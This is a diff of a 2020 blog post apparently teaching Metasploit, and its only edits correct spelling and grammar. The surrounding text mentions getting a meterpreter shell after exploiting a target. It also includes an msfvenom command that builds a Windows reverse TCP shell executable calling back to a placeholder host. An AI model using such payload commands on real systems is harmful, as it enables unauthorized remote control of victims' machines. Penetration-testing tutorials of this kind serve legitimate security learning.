MrW0r57/MrW0r57.github.io/_posts/2020-05-28-Metasploit Framework 7.2.md

 [*] Uploading payload
 ```

-And this will exploit the vulnerabilty on the target and you will get meterpreter shell on your metasploit-framework.
+And this will exploit the vulnerability on the target and you will get meterpreter shell on your metasploit-framework.

 **Msfvenom**

-Its my personal favourite, i will explain to use it in my way.
+It's my personal favorite, I will explain it to use it in my way.

 ```
 msfvenom -l
 ```

-Lets create a windows reverse TCP shell
+Let's create windows reverse TCP shell

-Launch your terminal and execute command below
+Launch your terminal and execute the command below

 ```
 msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > hackershell.exe